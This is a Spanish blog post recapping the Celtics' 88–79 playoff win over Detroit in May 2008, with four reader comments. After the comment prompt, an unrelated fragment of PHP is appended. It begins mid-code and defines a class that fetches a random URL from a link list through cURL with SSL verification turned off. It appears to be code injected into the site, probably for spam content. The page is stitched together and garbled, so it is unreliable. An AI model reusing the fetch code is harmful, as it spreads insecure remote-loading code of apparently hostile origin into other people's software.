Infatigables Celtics (DET 79 – BOS 88)

21 de May de 2008 por TheDeerHunter

Apenas ni un día de descanso para Celtics desde la extenuante eliminación de Lebron y los suyos en 7 partidos, acumulando ni más ni menos que 96 y pareciendo que se les notaba el lógico desgaste. Detroit, con 3 partidos menos y bastantes más días de descanso no supo o no pudo ayer aprovecharse de ese factor. Lo peor de todo para ellos es que la victoria vino precísamente por esa vía, la del físico, la de la intensidad, la defensa a muerte. Ni siquiera hizo falta la recuperación de Ray Allen, o una gran aportación de otros jugadores más allá de los dos habituales. Pocas oportunidades tendrá Detroit mejor que esta para ganar en el Boston Garden.

Es cierto que volvía Billups tras su lesión. Si se hablaba de que hubiera podido volver en los últimos partidos contra Orlando, la de anoche fue una actuación decepcionante. Está peor de lo que pensábamos y Detroit lo necesitará en perfectas condiciones para pasar a la final. Boston se limitó a controlar a Hamilton y dejó al resto en sus números habituales. No hizo falta mucho más. Un buen trabajo defensivo y el enésimo gran partido de Garnett y Pierce ante una defensa muy por debajo de lo que se le presupone a Detroit fue suficiente para llevarse la importantísima primera victoria sin demasiados alardes.

Todo acaba de empezar, pero Detroit deberá mejorar mucho si quiere ganar algún partido en el inexpugnable baluarte de Boston.

Comenta

4 comentarios a esta entrada

  1. txusma dice:
    #1

    No me extrañaría un 4-3 a favor de Boston. Lo de este equipo empieza a ser de juzgado de guardia.

      Citar

  2. Gallis dice:
    #2

    Ya te digo. Aunque creo que de los 3 rivales que les quedan, Pistons, Lakers y Spurs, Detroit es el equipo más capacitado de ganar en el Garden. Realmente los 3 podrían (o nadie podrá?), pero los Pistons me parecen los que tienen más posibilidades de haacerlo, así que si no lo consiguen, la final va a ser durísima…

      Citar

  3. TheDeerHunter dice:
    #3

    Lo de no perder ni un sólo partido en el Garden no se lo creen ni ellos. Que vayan pensando en ganar alguno fuera… por si las moscas.

      Citar

  4. Gallis dice:
    #4

    No, si está claro, de hecho un equipo que en 2 rondas no han ganado fuera de casa no es más favorito que los demás…pero si los Pistons no son capaces de ganar en el Garden y de repente a estos les da por ganar en Detroit despejan todas las dudas de un plumazo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>